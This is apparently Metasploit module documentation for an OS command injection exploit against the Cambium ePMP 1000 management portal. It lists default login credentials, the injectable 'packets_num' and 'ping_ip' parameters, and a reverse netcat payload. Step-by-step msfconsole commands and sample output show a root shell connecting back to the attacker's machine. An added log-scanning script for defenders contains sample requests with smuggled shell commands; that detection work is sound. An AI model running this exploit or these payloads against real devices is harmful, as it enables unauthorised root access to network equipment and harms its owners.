This module exploits an OS command injection vulnerability in the Cambium ePMP 1000 device management portal. It requires any one of the following default login credentials - admin/admin, installer/installer or home/home - to set up a reverse netcat shell.

The module injects the payload into the 'packets_num' parameter. Alternatively, a second vulnerable parameter, 'ping_ip', can also be used.

Note: cmd/unix/reverse_netcat is the only payload that appears to work reliably. After the session is opened there may be a slight delay in the response to the first command issued; responses to subsequent commands arrive without delay. Using 'exploit -j' is recommended.
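As an added defender-side example (not part of this module or of the Metasploit project), the following script scans web-server access-log lines from the device for requests whose 'ping_ip' or 'packets_num' values are not a plain IPv4 address or a small positive integer, which is all the portal's ping function legitimately needs. The log format, the request path and the sample lines are constructed assumptions; only the two parameter names come from the description above.

```python
"""Flag ePMP ping requests whose parameters carry anything other than an
IPv4 address (ping_ip) or a small integer (packets_num).

Added example; the log format and request path below are assumptions."""
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (common log format, GET request line).
# The "/ping" path is a placeholder, not the real portal endpoint.
SAMPLE_LOG = """\
10.0.0.5 - - [02/Dec/2017:06:07:55 +0700] "GET /ping?ping_ip=192.168.0.1&packets_num=4 HTTP/1.1" 200 512
10.0.0.9 - - [02/Dec/2017:06:08:00 +0700] "GET /ping?ping_ip=192.168.0.1&packets_num=4%3Bid HTTP/1.1" 200 17
10.0.0.9 - - [02/Dec/2017:06:08:30 +0700] "GET /ping?ping_ip=127.0.0.1%60id%60&packets_num=1 HTTP/1.1" 200 17
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"'
)

def parameter_findings(target):
    """Return [(param, decoded_value, reason)] for values the ping form
    should never legitimately send. parse_qs URL-decodes the values, so
    encoded shell metacharacters are inspected in their decoded form."""
    findings = []
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for value in params.get("ping_ip", []):
        try:
            ipaddress.IPv4Address(value)  # strict dotted-quad parse
        except ValueError:
            findings.append(("ping_ip", value, "not a plain IPv4 address"))
    for value in params.get("packets_num", []):
        if not (value.isdigit() and 0 < int(value) <= 100):
            findings.append(("packets_num", value, "not a small positive integer"))
    return findings

def scan_log(text):
    """Scan access-log text; return [(src, timestamp, param, value, reason)]."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not parse as a request record
        for param, value, reason in parameter_findings(m["target"]):
            hits.append((m["src"], m["ts"], param, value, reason))
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("suspicious request from %s at %s: %s=%r (%s)" % hit)
```

The same check can be applied at a reverse proxy in front of the portal: reject the request outright when either parameter fails validation, rather than only logging it.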
## Verification Steps

- Do: `use exploit/unix/http/epmp1000_ping_cmd_shell`
- Do: `set RHOST [IP]`
- Do: `set RPORT [PORT]`
- Do: `set LHOST [IP]`
- Do: `exploit -j`
## Sample Output

```
msf > use exploit/unix/http/epmp1000_ping_cmd_shell
msf exploit(epmp1000_ping_cmd_shell) > set RHOST 192.168.0.2
msf exploit(epmp1000_ping_cmd_shell) > set RPORT 80
msf exploit(epmp1000_ping_cmd_shell) > set LHOST 192.168.0.104
msf exploit(epmp1000_ping_cmd_shell) > exploit -j
[*] Started reverse TCP handler on 192.168.0.104:4444
[+] SUCCESSFUL LOGIN - 192.168.0.2:80 - "installer":"installer"
[*] Sending payload...
[*] Command shell session 10 opened (192.168.0.104:4444 -> 192.168.0.2:43594) at 2017-12-02 06:08:00 +0700
msf exploit(epmp1000_ping_cmd_shell) > sessions -l

Active sessions
===============

  Id  Type      Information  Connection
  --  ----      -----------  ----------
  10  shell     cmd/unix     192.168.0.104:4444 -> 192.168.0.2:43594 (192.168.0.2)

msf exploit(epmp1000_ping_cmd_shell) > sessions -i 10
[*] Starting interaction with 10...

id
uid=0(root) gid=0(root)
```